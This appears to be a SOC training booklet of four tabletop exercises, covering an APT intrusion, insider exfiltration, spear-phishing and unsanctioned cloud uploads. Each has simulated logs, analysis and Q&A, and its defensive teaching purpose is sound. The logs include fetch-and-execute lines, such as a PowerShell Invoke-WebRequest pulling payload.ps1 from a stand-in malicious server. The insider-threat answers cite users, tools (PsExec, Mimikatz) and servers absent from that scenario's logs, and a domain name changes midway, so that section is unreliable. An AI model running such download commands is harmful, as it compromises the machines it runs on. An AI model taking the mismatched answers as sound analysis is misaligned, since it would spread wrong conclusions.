EXERCISE FOR

SOC:
ANALYSIS AND
INCIDENT
RESPONSE
FLOW

BY IZZMIER IZZUDDIN
SCENARIO: ADVANCED PERSISTENT THREAT (APT) ACTIVITY DETECTED

Scenario: A SOC analyst detects potential suspicious activity indicating a sophisticated

attack targeting the organization's infrastructure. The objective is to analyse logs, identify
the threat and respond appropriately using a structured incident response plan.

BACKGROUND

Company: IzzTech Solutions

Industry: Financial Services
Network Infrastructure:

• Corporate network with segmented VLANs (HR, Finance, IT).

• Active Directory (AD) environment.
• Endpoint Detection and Response (EDR) deployed across devices.
• Cloud-based services (email, storage).

Threat Report: External threat intelligence indicates increased APT activity targeting
financial institutions.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs (below).

2. Conduct Analysis: Follow a structured approach for identifying the root cause.
3. Response Planning: Propose mitigation steps based on the findings.

LOGS

1. Firewall Logs

2025-01-16 08:23:12 INFO Accept TCP 203.0.113.25:54321 -> 192.168.10.15:3389

(Remote Desktop Protocol)
2025-01-16 08:24:45 ALERT Drop TCP 203.0.113.25:65432 -> 10.0.0.50:22 (SSH)
2025-01-16 08:30:09 INFO Accept TCP 198.51.100.12:443 -> 192.168.20.45:8080 (HTTP
Proxy)
2025-01-16 08:31:33 ALERT Drop TCP 198.51.100.12:443 -> 192.168.30.15:1433 (SQL
Server)
2025-01-16 08:35:21 INFO Accept TCP 203.0.113.25:12345 -> 192.168.40.10:445 (SMB)

2. SIEM Logs

2025-01-16 08:23:12 INFO Successful RDP login detected from 203.0.113.25 to

192.168.10.15 by user "izzmier".
2025-01-16 08:23:45 INFO Multiple failed SSH login attempts to 10.0.0.50 from
203.0.113.25.
2025-01-16 08:31:00 WARNING Large outbound data transfer initiated from 192.168.10.15
to 198.51.100.12.
2025-01-16 08:32:15 ALERT Suspicious file transfer via SMB from 192.168.10.15 to
192.168.40.10.
2025-01-16 08:34:50 ALERT Credential dumping tools executed on 192.168.10.15 by user
"izzmier".
2025-01-16 08:35:30 INFO User "izzmier" privileges escalated to Domain Admin on
192.168.10.15.

3. Endpoint Detection Logs

2025-01-16 08:22:45 DETECTED Powershell script executed by izzmier on 192.168.10.15.

Script Content: "Download payload from hxxp://malicious-site.com/payload.exe and
execute."
2025-01-16 08:34:10 DETECTED Malicious executable "payload.exe" launched on
192.168.10.15.
2025-01-16 08:34:30 ALERT Unauthorised modification of LSASS memory on
192.168.10.15.
2025-01-16 08:35:10 INFO File "data.zip" (500MB) created on 192.168.10.15 and moved via
SMB to 192.168.40.10.

ANALYSIS AND ELABORATION

Step 1: Initial Detection

• Observation: Logs indicate an RDP connection initiated by an external IP

(203.0.113.25) to an internal system (192.168.10.15) with credentials of "izzmier".
• Suspicion: Unauthorised access via valid credentials (potential credential theft).

Step 2: Investigate Lateral Movement

• Firewall Logs: Show SMB communication from 192.168.10.15 to 192.168.40.10.

• Endpoint Logs: Evidence of credential dumping via LSASS memory.
• Conclusion: The attacker used legitimate credentials to move laterally and dump
additional credentials.

Step 3: Data Exfiltration

• SIEM Logs: Large data transfer from 192.168.10.15 to an external IP

(198.51.100.12).
• Endpoint Logs: Data was compressed into a zip file before transfer.
• Conclusion: Data exfiltration is confirmed.
Step 4: Privilege Escalation

• SIEM Logs: User "izzmier" escalated privileges to Domain Admin.

• Endpoint Logs: Malicious PowerShell and executables executed.
• Conclusion: The attacker achieved high-level access.

Incident Response Plan

1. Containment:
o Isolate affected systems (192.168.10.15 and 192.168.40.10).
o Block external IPs (203.0.113.25 and 198.51.100.12).
2. Eradication:
o Terminate malicious processes (e.g., "payload.exe").
o Reset credentials for compromised accounts (e.g., "izzmier").
o Patch exploited vulnerabilities.
3. Recovery:
o Restore affected systems from backups.
o Conduct a thorough system and network scan to ensure no persistence
mechanisms remain.
4. Post-Incident:
o Document findings and share with stakeholders.
o Implement multi-factor authentication (MFA) and improved segmentation.
o Update incident response playbooks based on lessons learned.

DISCUSSION QUESTIONS WITH ANSWERS

1. What initial indicators raised suspicion of an attack?

• The firewall logs showing RDP access from an external IP (203.0.113.25) to an

internal host (192.168.10.15) raised suspicion, especially since RDP should
typically not be exposed to external networks.
• SIEM logs revealed a successful login using the "izzmier" account, followed by
lateral movement and privilege escalation.
• Endpoint detection logs indicated malicious activity, such as PowerShell script
execution and credential dumping.

2. How would you validate the authenticity of the "izzmier" credentials?

• Check login history to see if the same IP address (203.0.113.25) has been used
previously by "izzmier" or if it's an anomaly.
• Correlate authentication logs with MFA usage to determine if additional
authentication steps were bypassed.
• Review logs from the authentication server (e.g., Active Directory) for anomalies
like login attempts from unusual geographic locations or devices.
 • Conduct a user verification by contacting "izzmier" to confirm if they initiated the
session or if their credentials were stolen.

3. What additional logs or data would be helpful in this analysis?

• DNS logs: To identify if the external IP (203.0.113.25) communicated with any

known malicious domains.
• Proxy logs: To capture details about the outbound traffic, including the destination
and data transferred.
• Threat intelligence feeds: To cross-reference external IPs (203.0.113.25 and
198.51.100.12) with known indicators of compromise (IOCs).
• Email gateway logs: To check if phishing emails were used to compromise
"izzmier."
• Endpoint telemetry: To detect any additional tools or persistence mechanisms left
behind by the attacker.

4. What proactive measures could prevent such incidents in the future?

1. Harden RDP access:

o Use VPN for remote access instead of exposing RDP to the internet.
o Implement MFA for all RDP sessions.
2. Enhance monitoring and detection:
o Set up alerts for unusual login patterns, such as logins from foreign IPs or
privilege escalation activities.
o Deploy anomaly-based behavior monitoring to flag deviations from normal
user activity.
3. Credential security:
o Enforce complex password policies and regular password changes.
o Implement phishing-resistant MFA (e.g., FIDO2 tokens) to prevent stolen
credentials from being misused.
4. Network segmentation:
o Limit lateral movement by segregating critical resources into isolated VLANs.
o Use firewalls and access control lists (ACLs) to restrict communication
between segments.
5. Regular vulnerability management:
o Apply security patches promptly.
o Conduct periodic penetration tests to identify weaknesses.
6. Incident response readiness:
o Regularly test incident response playbooks through tabletop exercises and
simulations.
o Train SOC analysts on detecting advanced threats and using SIEM/EDR
effectively.
TABLETOP EXERCISE FOR SOC: INSIDER THREAT WITH DATA
EXFILTRATION

Scenario: The SOC team receives an alert from the DLP (Data Loss Prevention) system
regarding unusual file transfer activity initiated by an internal employee. The objective is to
investigate whether the activity is malicious and respond accordingly.

BACKGROUND

Company: CloudIzz Solutions

Industry: Technology (Cloud Storage)
Network Infrastructure:

• Segmented network with specific VLANs for Engineering, HR, Finance and R&D.
• File storage servers located on a restricted R&D VLAN (192.168.50.0/24).
• Employees use managed laptops with EDR solutions.
• Centralised file transfer and collaboration tool (e.g., OneDrive).

Incident: A departing employee from the R&D department is suspected of exfiltrating

proprietary information before their resignation date.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs below.

2. Conduct Analysis: Perform an investigation to determine the scope of the incident.
3. Response Planning: Suggest containment, eradication and mitigation steps.

LOGS

1. Proxy Logs

2025-01-16 10:03:12 User: alice.wong, Destination: file-share.cloudsync.com, File:

"project_alpha_designs.pdf", Sise: 5MB
2025-01-16 10:05:45 User: alice.wong, Destination: external-cloud.com, File:
"client_data.zip", Sise: 200MB
2025-01-16 10:08:30 User: alice.wong, Destination: external-cloud.com, File:
"r&d_archive_2024.zip", Sise: 1.5GB
2025-01-16 10:10:15 User: alice.wong, Destination: 198.51.100.55, Protocol: HTTP POST,
Data Transferred: 500MB

2. SIEM Logs

2025-01-16 09:59:12 INFO User "alice.wong" logged in to workstation 192.168.50.12 from

IP 192.168.50.110.
2025-01-16 10:00:45 ALERT File "r&d_archive_2024.zip" accessed from file server
192.168.50.50 by user "alice.wong".
2025-01-16 10:05:30 INFO Unauthorised tool "dataexfil_tool.exe" executed on
192.168.50.12.
2025-01-16 10:08:10 WARNING Large outbound file transfer (1.5GB) detected from
192.168.50.12 to external-cloud.com.
2025-01-16 10:09:00 INFO Privileges for "alice.wong" escalated to Admin on
192.168.50.12.

3. EDR Logs

2025-01-16 10:00:10 DETECTED File "dataexfil_tool.exe" downloaded by user "alice.wong"

on 192.168.50.12.
2025-01-16 10:01:25 INFO USB device connected to 192.168.50.12.
2025-01-16 10:02:10 ALERT USB file transfer of "project_alpha_designs.pdf" completed
(5MB).
2025-01-16 10:06:15 WARNING Clipboard monitoring: Sensitive text copied, containing
keywords "client names".
2025-01-16 10:09:45 INFO Malicious process "dataexfil_tool.exe" attempted to bypass
DLP controls.

ANALYSIS AND ELABORATION

Step 1: Initial Alert

• Observation: The proxy logs showed a significant data transfer to external-

cloud.com and the SIEM flagged unauthorised tool execution.
• Suspicion: Possible insider threat involving Alice Wong in the R&D department.

Step 2: Investigate Employee Activity

• Proxy Logs: Revealed multiple large file transfers to external cloud storage and a
public IP (198.51.100.55).
• EDR Logs: Highlighted the use of "dataexfil_tool.exe" and USB activity, suggesting
attempts to exfiltrate sensitive data.
• SIEM Logs: Showed privilege escalation, further implicating Alice Wong.

Step 3: Data Exfiltration Methods

• USB Drive: File "project_alpha_designs.pdf" was transferred to an unknown device.

• Cloud Upload: Files "client_data.zip" and "r&d_archive_2024.zip" were uploaded to
external-cloud.com.
• HTTP POST Request: 500MB of unknown data was transferred to an external IP.
Step 4: Insider Threat Confirmation

• Behavioral Analysis:
o Escalation of privileges to Admin before file access.
o Execution of a known data exfiltration tool.
o Clipboard monitoring detected sensitive text copied.

INCIDENT RESPONSE PLAN

1. Containment

• Isolate Systems: Disconnect Alice Wong’s workstation (192.168.50.12) from the

network.
• Revoke Access: Immediately disable Alice Wong's Active Directory account and
remove admin privileges.
• Block Data Transfers: Block external-cloud.com and 198.51.100.55 at the proxy
and firewall levels.

2. Eradication

• Scan and Remove Malware: Run a full antivirus scan to remove

"dataexfil_tool.exe" and other malicious artifacts.
• Audit USB Devices: Identify and retrieve the connected USB device for forensic
analysis.

3. Recovery

• Restore System State: Revert Alice Wong’s workstation to a clean state from a
known-good backup.
• Review File Server: Check for any modifications or deletions on the file server
(192.168.50.50).

4. Post-Incident Actions

• Conduct Employee Interviews: Question Alice Wong about the incident and
involve HR/legal for further steps.
• Enhance DLP Controls: Improve detection of unauthorised tools and increase
monitoring for large outbound file transfers.
• Security Awareness Training: Educate employees about insider threats and
acceptable use policies.
• Policy Update: Implement stricter controls on privilege escalation and external file
sharing.

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of malicious activity in this scenario?

• Unauthorised Privilege Escalation: The use of PsExec to log in as the SYSTEM

account is a clear indicator of privilege escalation, which was unauthorised.
• Lateral Movement: alice.jones moved across critical servers (from Server-DC01 to
Server-DB01 and Server-WEB01) without appropriate authorization, which is a key
indicator of potential malicious activity.
• Privilege Escalation Tools: The use of privilege escalation tools like Mimikatz on
Server-DB01 further supports the notion of malicious intent.
• Suspicious DNS Query: The DNS request to a suspicious domain (external.com)
indicates possible data exfiltration or communication with an external command-
and-control (C2) server.
• Rapid Escalation and Lateral Movement: The short time between escalations and
lateral movement across the network suggests malicious intent rather than normal
IT operations.

2. What steps would you take to confirm whether the data exfiltration was intentional
or accidental?

• Check File Access Logs: Analyse file access logs on the compromised systems to
determine if any sensitive data was accessed or transferred during the
unauthorised actions.
• Inspect Outbound Traffic: Review firewall logs and outbound network traffic for
signs of large file transfers or communication with external IP addresses (especially
those associated with known C2 servers or suspicious domains).
• Analyse DNS Queries: Investigate all DNS requests made during the incident,
especially the suspicious query to external.com, to identify any connections to
external destinations. If there was an attempt to connect to a known malicious
server, it could indicate intentional exfiltration.
• Review Endpoint and Server Activity: Examine logs from endpoint security tools
(EDR) and server-side tools for signs of data transfer, such as file uploads,
compressions or external device connections.
• Interview the Involved Individual: If possible, conduct an interview with
alice.jones to assess whether the actions were intentional or accidental. Her
explanation could provide insight into whether the activity was a result of a
legitimate administrative task or malicious intent.

3. How would you handle the legal and HR aspects of an insider threat investigation?

• Document Everything: Ensure all findings and actions are thoroughly documented,
including system logs, interview records and any other relevant data. This
documentation can serve as evidence if legal action is required.
• Legal Consultation: Involve legal counsel early in the investigation to ensure that
all actions taken are legally sound and compliant with company policies, especially
 when dealing with potential data breaches, privileged access misuse or violations
of labor laws.
• Preserve Evidence: Make sure that evidence is properly preserved to avoid any
potential tampering. This includes preserving system logs, captured artifacts and
backup files in case they are required for further investigation or litigation.
• HR Collaboration: Work closely with HR to assess the situation from an
employment perspective. Ensure that the investigation respects the employee's
rights and confidentiality. Depending on the findings, HR may need to manage the
disciplinary process.
• Ensure Fairness and Transparency: Investigate the issue impartially, ensuring that
all involved parties are treated fairly. If the investigation suggests malicious intent,
the disciplinary process should be aligned with company policies and contractual
agreements.

4. What proactive measures can prevent future insider threats?

• Least Privilege Access Control: Implement and enforce a strict least privilege
access model, where users only have the minimum level of access required for their
roles. Regularly review and audit access permissions.
• Privileged Access Management (PAM): Deploy PAM solutions to control, monitor
and audit the use of privileged accounts. This can prevent unauthorised privilege
escalation and provide greater visibility into who is accessing critical systems.
• Employee Monitoring and Behavioral Analytics: Implement user and entity
behavior analytics (UEBA) to monitor users’ actions for signs of anomalous behavior
that could indicate malicious intent. Flagging unusual patterns can help detect
insider threats early.
• Data Loss Prevention (DLP) Systems: Use DLP tools to monitor and prevent the
unauthorised movement of sensitive data. Ensure that DLP policies are tailored to
monitor cloud, on-premises and endpoint data access.
• Endpoint Detection and Response (EDR): Implement EDR solutions that detect
suspicious activity on endpoints, such as the use of privilege escalation tools or
remote administrative tools that are not part of normal operations.
• Regular Employee Training: Conduct regular security awareness training for
employees to educate them on the risks of insider threats, how to spot suspicious
activities and the importance of adhering to security policies.
• Background Checks and Continuous Monitoring: Implement background checks
for employees in sensitive positions and continuously monitor their access and
activities as part of an overall insider threat mitigation strategy.
TABLETOP EXERCISE FOR SOC: ADVANCED PERSISTENT THREAT (APT) -
SPEAR PHISHING ATTACK

Scenario: The SOC receives an alert indicating that multiple users within the Finance
department have received a spear-phishing email. The email contains a malicious
attachment, which, when opened, executed a PowerShell script that gained initial access
to the organization's network.

The goal is to investigate the attack, understand its scope and implement the appropriate
response actions.

BACKGROUND

Company: IzzFin Tech

Industry: Financial Services (Banking and Finance)
Network Infrastructure:

• Segmented network with Finance, HR, IT and Management VLANs.

• Sensitive financial data stored on centralised file servers (192.168.40.0/24).
• Endpoint protection is deployed across all devices (EDR solutions).
• Email filtering and anti-malware solutions in place.

Incident: The Finance department's internal systems are targeted with a spear-phishing
campaign and the attacker uses an Office document with embedded macros to deliver the
initial payload.

EXERCISE OVERVIEW

1. Inject Simulated Logs: Provide detailed logs below.

2. Conduct Analysis: Perform an investigation to determine the extent of the attack.
3. Response Planning: Suggest containment, eradication and mitigation steps.

Logs

1. Email Logs

2025-01-15 08:30:22 Incoming email from external address:

[email protected], Subject: "Invoice for Q4 - Immediate Payment Required"
2025-01-15 08:31:05 Email delivered to user "[email protected]" in Finance dept.
2025-01-15 08:35:20 User "izzuddin" opened attachment "Invoice_Q4.docx" containing
embedded macros.
2025-01-15 08:36:15 User "izzuddin" allowed macros to run in "Invoice_Q4.docx".
2025-01-15 08:38:45 Email delivered to user "[email protected]" in Finance dept.
2025-01-15 08:40:05 User "mary.jones" opened attachment "Invoice_Q4.docx".
2. SIEM Logs

2025-01-15 08:35:10 INFO User "izzuddin" logged in from IP 192.168.20.110 (Finance

VLAN).
2025-01-15 08:36:05 WARNING PowerShell script executed on "izzuddin" machine
(192.168.20.110), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri
http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 08:38:30 INFO User "mary.jones" logged in from IP 192.168.20.112 (Finance
VLAN).
2025-01-15 08:39:00 WARNING PowerShell script executed on "mary.jones" machine
(192.168.20.112), Command: Invoke-Expression -Command "Invoke-WebRequest -Uri
http://maliciousserver.com/payload.ps1 -OutFile C:\Temp\payload.ps1"
2025-01-15 09:00:50 INFO Outbound network traffic from "izzuddin" machine
(192.168.20.110) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
2025-01-15 09:02:00 INFO Outbound network traffic from "mary.jones" machine
(192.168.20.112) to external IP 203.0.113.10, Port 80, Data Transferred: 350KB
2025-01-15 09:05:10 INFO Lateral movement detected from "izzuddin" (192.168.20.110) to
"iffah" (192.168.20.115) in Finance VLAN via SMB.

3. EDR Logs

2025-01-15 08:35:20 ALERT Malicious PowerShell activity detected on "izzuddin" machine

(192.168.20.110).
2025-01-15 08:36:00 DETECTED PowerShell payload download initiated from
http://maliciousserver.com/payload.ps1.
2025-01-15 08:37:30 ALERT Malware execution detected from C:\Temp\payload.ps1.
2025-01-15 08:39:00 ALERT Malicious PowerShell script detected on "mary.jones"
machine (192.168.20.112).
2025-01-15 08:39:45 DETECTED PowerShell payload download initiated from
http://maliciousserver.com/payload.ps1.
2025-01-15 09:00:15 ALERT Lateral movement detected on "izzuddin" machine
(192.168.20.110), SMB connection to "iffah" (192.168.20.115).
2025-01-15 09:05:00 ALERT Privilege escalation attempt from "izzuddin" machine to "iffah"
machine.

ANALYSIS AND ELABORATION

Step 1: Initial Compromise

• Email Logs: The spear-phishing email was sent to both "izzuddin" and "mary.jones"
with a malicious attachment ("Invoice_Q4.docx").
• EDR Logs: Both users executed the malicious PowerShell script from the
document, downloading the payload (payload.ps1).
 • SIEM Logs: The PowerShell command (Invoke-WebRequest -Uri) indicates the
script downloaded the malicious payload from an external IP (203.0.113.10), which
is suspicious.

Step 2: Lateral Movement and Privilege Escalation

• SIEM Logs: Both "izzuddin" and "mary.jones" made outbound connections to the
external server and downloaded the payload.
• EDR Logs: Lateral movement was detected from "izzuddin" (192.168.20.110) to
"iffah" (192.168.20.115) via SMB, suggesting an attempt to spread the infection.
• Privileged Escalation: Privilege escalation attempts were logged, indicating that
the attacker is trying to elevate their access to gain more control over internal
systems.

Step 3: Malware Execution

• EDR Logs: The payload was executed on both "izzuddin" and "mary.jones"
machines, suggesting that the malware is successfully running on these endpoints.
• SMB Traffic: The malware attempted to use SMB for lateral movement, which is
common for spreading malware inside internal networks.

INCIDENT RESPONSE PLAN

1. Containment

• Isolate Compromised Systems: Disconnect "izzuddin," "mary.jones," and "iffah"

machines from the network.
• Block Malicious Domains: Block outbound traffic to maliciousserver.com at the
firewall level.
• Disable User Accounts: Temporarily disable "izzuddin," "mary.jones," and "iffah"
accounts in Active Directory.

2. Eradication

• Remove Malware: Run full antivirus scans on the infected machines and remove
the malware (payload.ps1).
• Check for Persistence: Inspect the registry, scheduled tasks and autorun entries
for any persistence mechanisms that the attacker might have left behind.
• Patch Vulnerabilities: Ensure that the systems are patched to close any
vulnerabilities that may have been exploited.

3. Recovery

• Restore Systems: Restore the affected machines from clean backups.

 • Monitor for Re-infection: Set up monitoring for any signs of re-infection or further
lateral movement in the network.

4. Post-Incident Actions

• Forensic Analysis: Perform a detailed investigation on the external IP

(203.0.113.10) to gather more information about the attacker.
• Update Email Filtering: Enhance email filtering rules to prevent similar spear-
phishing emails from reaching users in the future.
• Review Security Policies: Review and update security policies related to macro
use in emails and document attachments.
• Employee Awareness: Conduct phishing awareness training to help employees
identify similar attacks in the future.

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of compromise (IOCs) that pointed to a spear-phishing
attack?

• Email Headers and Attachments: The incoming email from an external address
([email protected]) with the subject "Invoice for Q4 - Immediate
Payment Required" raised suspicion, especially since it was sent to multiple
finance department employees.
• Attachment Behavior: The attached document, Invoice_Q4.docx, contained
embedded macros. The fact that users opened the attachment and enabled macros
is a common tactic used in spear-phishing attacks to execute malicious code.
• PowerShell Execution: The logs show that both users executed PowerShell
commands (Invoke-WebRequest -Uri http://maliciousserver.com/payload.ps1) to
download a malicious payload, a key indicator of a successful phishing attempt.
• Outbound Network Traffic: The outbound connection to an external IP
(203.0.113.10) for downloading a payload indicates malicious activity, as this IP
should not be associated with legitimate business traffic.

2. How would you confirm whether the attack was initiated by a targeted or random
spear-phishing campaign?

• Review Email Content: Targeted spear-phishing campaigns often involve highly

personalised emails that reference specific details about the victim, such as job
role, projects or internal processes. If the email appears generic (like the "Invoice
for Q4" subject), it may indicate a random campaign.
• Investigate Additional Recipients: Check if other employees, especially those with
similar roles or in the same department (Finance), also received similar emails. If
the email was broadly sent, it may suggest a random campaign.
 • Examine Historical Patterns: If the company has experienced similar phishing
attempts in the past that targeted specific roles or departments (e.g., Finance, HR),
it may suggest a more targeted approach.
• Threat Intelligence: Collaborate with external threat intelligence sources or use
services like VirusTotal to determine whether the sender's domain or payload IP
address has been seen in previous attacks, which can provide insight into the
nature of the campaign.

3. What steps can be taken to prevent PowerShell-based attacks in the future?

• Restrict PowerShell Execution Policies: Implement stricter PowerShell execution

policies on endpoints (e.g., Set-ExecutionPolicy Restricted) to prevent unauthorised
script execution.
• PowerShell Logging and Auditing: Enable PowerShell script block logging and
transcription in Windows Event Logs to capture detailed activity. This can help
detect malicious scripts that are executed on the system.
• AppLocker or Device Guard: Use AppLocker or Windows Defender Device Guard
to block the execution of PowerShell scripts or limit execution to only trusted
sources or specific administrators.
• Endpoint Detection and Response (EDR): Configure EDR solutions to flag
suspicious PowerShell commands, particularly those that download or execute
files from external sources.
• Network Segmentation: Ensure that systems running sensitive tasks (like file
servers or administrative workstations) are segmented from regular users' systems
to prevent lateral movement if PowerShell scripts are run on non-administrative
workstations.
• User Awareness Training: Train employees on recognising and avoiding malicious
attachments, especially those that prompt users to enable macros or run scripts.

4. How would you handle the forensic investigation of external IP addresses used in
the attack?

• IP Reputation Lookup: Use threat intelligence platforms or services like VirusTotal

or Cisco Talos to check the reputation of the external IP address (203.0.113.10).
This could identify whether the IP is associated with known malicious activity.
• Traffic Analysis: Review the outbound traffic to the IP address in detail (e.g.,
timestamps, sise of data packets, protocols) to understand the nature of
communication between the compromised systems and the external attacker.
• Track Data Transfer: Investigate what data was transferred from the compromised
systems to the malicious server by analysing the file contents (e.g., whether
sensitive data was exfiltrated) and network logs (e.g., traffic patterns, protocols
used).
• Triage Other Affected Systems: Identify any other systems that may have
communicated with the same external IP to assess the full scope of the attack.
 • Engage Law Enforcement (if necessary): If the external IP is part of a larger known
criminal infrastructure, consider engaging law enforcement or relevant cybercrime
authorities for further investigation.

5. What role does email filtering and endpoint protection play in preventing such
attacks and how can they be improved?

• Email Filtering:
Email filtering plays a crucial role in identifying and blocking spear-phishing emails
before they reach end users. Filters can analyse:
o Attachments: Blocking or sandboxing potentially dangerous attachments
(e.g., .docx, .xlsm, .exe, etc.).
o Links: Flagging URLs with suspicious or blacklisted domains.
o Heuristic Analysis: Identifying phishing attempts based on email content,
sender reputation and behavior (e.g., spoofing of internal company email
addresses).

To improve email filtering:

o Use advanced filtering tools that analyse email body content for suspicious
patterns.
o Implement DMARC, SPF and DKIM to ensure emails claiming to come from
internal domains are verified.
o Enable automated sandboxing of attachments before delivery to users.
• Endpoint Protection:
Endpoint protection (EDR solutions) detects and prevents malicious activities on
user machines. In this case, EDR could detect the malicious PowerShell script
execution, isolate the infected machine and block communication with the external
server.

To improve endpoint protection:

o Regularly update signature-based antivirus tools to catch new malware.

o Enable behavioral analysis features to identify abnormal activity such as
suspicious script execution or lateral movement.
o Employ endpoint isolation capabilities that automatically disconnect
infected devices from the network to prevent further spread.
SCENARIO 4: INTERNAL DATA EXFILTRATION VIA CLOUD STORAGE

Scenario: A security analyst at a company notices unusual behavior from an internal user.
The user is an employee in the Legal department who has access to sensitive internal
documents. The user, however, starts uploading several large files to a personal cloud
storage account, which is outside the company's approved cloud services.

The analyst flags this activity as potentially malicious and escalates the issue for further
investigation.

LOGS

1. Firewall Logs

Jan 17 14:20:12 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to

personal cloud storage (cloudservice.com)
Jan 17 14:22:47 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to
personal cloud storage (cloudservice.com)
Jan 17 14:30:11 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to
personal cloud storage (cloudservice.com)
Jan 17 14:45:38 fw1 192.168.100.15 [OUTBOUND] - 203.0.113.45:443 - HTTPS traffic to
personal cloud storage (cloudservice.com)

2. User Activity Logs (File System Activity):

Jan 17 14:10:52 user-pc1 192.168.100.15 User "izzmier" accessed file

"Legal_Sensitive_Document_01.docx"
Jan 17 14:12:30 user-pc1 192.168.100.15 User "izzmier" copied
"Legal_Sensitive_Document_01.docx" to "E:\Temp\upload"
Jan 17 14:15:02 user-pc1 192.168.100.15 User "izzmier" accessed file
"Legal_Sensitive_Document_02.docx"
Jan 17 14:16:47 user-pc1 192.168.100.15 User "izzmier" copied
"Legal_Sensitive_Document_02.docx" to "E:\Temp\upload"
Jan 17 14:20:09 user-pc1 192.168.100.15 User "izzmier" uploaded file
"Legal_Sensitive_Document_01.docx" to cloud storage account (cloudservice.com)
Jan 17 14:20:43 user-pc1 192.168.100.15 User "izzmier" uploaded file
"Legal_Sensitive_Document_02.docx" to cloud storage account (cloudservice.com)
Jan 17 14:30:05 user-pc1 192.168.100.15 User "izzmier" uploaded file
"Legal_Sensitive_Document_03.docx" to cloud storage account (cloudservice.com)
Jan 17 14:35:12 user-pc1 192.168.100.15 User "izzmier" uploaded file
"Legal_Sensitive_Document_04.docx" to cloud storage account (cloudservice.com)
Jan 17 14:40:50 user-pc1 192.168.100.15 User "izzmier" uploaded file
"Legal_Sensitive_Document_05.docx" to cloud storage account (cloudservice.com)
3. Cloud Storage Access Logs:

Jan 17 14:20:09 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_01.docx"

uploaded by user "izzmier"
Jan 17 14:20:43 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_02.docx"
uploaded by user "izzmier"
Jan 17 14:30:05 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_03.docx"
uploaded by user "izzmier"
Jan 17 14:35:12 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_04.docx"
uploaded by user "izzmier"
Jan 17 14:40:50 cloudservice.com 203.0.113.45 File "Legal_Sensitive_Document_05.docx"
uploaded by user "izzmier"

4. Security Information and Event Management (SIEM) Logs:

Jan 17 14:21:30 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS

event=outbound_data_transfer
Jan 17 14:31:12 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS
event=outbound_data_transfer
Jan 17 14:45:22 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS
event=outbound_data_transfer
Jan 17 14:55:01 siem1 src=192.168.100.15 dest=203.0.113.45 protocol=HTTPS
event=outbound_data_transfer

ANALYSIS

1. Detection of Suspicious Activity:

• Unusual User Behavior: The user, izzmier, is part of the Legal department and has
access to sensitive documents, including Legal_Sensitive_Document_01.docx
through Legal_Sensitive_Document_05.docx. However, the user is uploading these
files to an external cloud storage provider, which is not sanctioned by the company.
• File System Activity: The logs show that the user copied multiple sensitive legal
documents from internal systems (e.g., Legal_Sensitive_Document_01.docx) to a
temporary folder (E:\Temp\upload). Subsequently, the files are uploaded to a
personal cloud storage service (cloudservice.com), which is unusual given the
sensitive nature of the documents.
• Network Traffic: The firewall logs show repeated outbound HTTPS traffic from
192.168.100.15 to 203.0.113.45 (cloudstorage.com). This activity is anomalous, as
it involves large file uploads to an external domain.
• Cloud Storage Access Logs: The cloud storage provider’s access logs show the
specific files uploaded by the user at regular intervals, indicating potential
exfiltration over a 20-minute period.
2. Indicators of Compromise (IOCs):

• Suspicious IP Address: 203.0.113.45 (personal cloud storage) is not recognised as

a legitimate business domain.
• Sensitive File Uploads: Several sensitive files from the legal department were
uploaded, including documents that contain proprietary legal content.
• High Volume of Data Transfer: The user uploaded five large files in a short time
window, which raises concern about data exfiltration.

RESPONSE ACTIONS

1. Immediate Containment:

• User Isolation: The first step is to isolate izzmier's account from the network to
prevent further data exfiltration. This can be done by disabling the user’s network
access and email account.
• Cloud Storage Block: Temporarily block the external cloud service
cloudservice.com to prevent further communication and uploads to that domain.
• Endpoint Isolation: Isolate the endpoint machine (user-pc1) that initiated the
uploads to prevent further data exfiltration or lateral movement.

2. Investigation:

• Examine the Files: Perform a forensic examination of the uploaded files to check if
they contain any sensitive or classified data. Analyse the content of these files to
understand the potential impact of the exfiltration.
• Review Historical Access Logs: Check if the user has uploaded other files to the
cloud storage in the past or if this is the first instance of this activity.
• Interview the User: Conduct an interview with the user (izzmier) to determine
whether the actions were intentional, negligent or the result of a compromise (e.g.,
credential theft).

3. Long-Term Mitigation:

• Revoke Access: If the activity is confirmed as malicious, permanently revoke the

user’s access to sensitive systems and reset all access credentials. Review access
controls for other users who may have similar permissions.
• Review Cloud Service Access Policies: Update and enforce strict policies to block
the use of non-approved cloud storage services for uploading sensitive data.
Implement solutions such as Data Loss Prevention (DLP) to prevent unauthorised
file uploads.
• Implement Network Monitoring: Strengthen network monitoring to detect any
future data exfiltration attempts. This can include alerting for high-volume data
transfers to non-approved external destinations.
 • Educate Employees: Conduct training sessions to ensure all employees are aware
of the company’s data protection policies and the consequences of unauthorised
data transfers.

DISCUSSION QUESTIONS AND ANSWERS

1. What were the key indicators of compromise (IOCs) in this scenario?

• Suspicious IP Address: Outbound traffic from the internal user’s machine to

203.0.113.45, an unauthorised cloud storage service.
• Large File Uploads: The user uploaded several large, sensitive files to a personal
cloud storage service.
• Unusual File System Activity: The user copied multiple sensitive documents to a
temporary directory and then uploaded them to an external service, which is a red
flag for data exfiltration.

2. How can we prevent unauthorised cloud storage use in the future?

• Block Unauthorised Cloud Services: Use a network firewall or web filtering

solution to block access to non-approved cloud storage services.
• Data Loss Prevention (DLP): Implement DLP solutions to monitor and prevent
unauthorised uploads of sensitive files to cloud services.
• User Training and Awareness: Regularly train employees on data protection
policies, including acceptable use of cloud storage services.
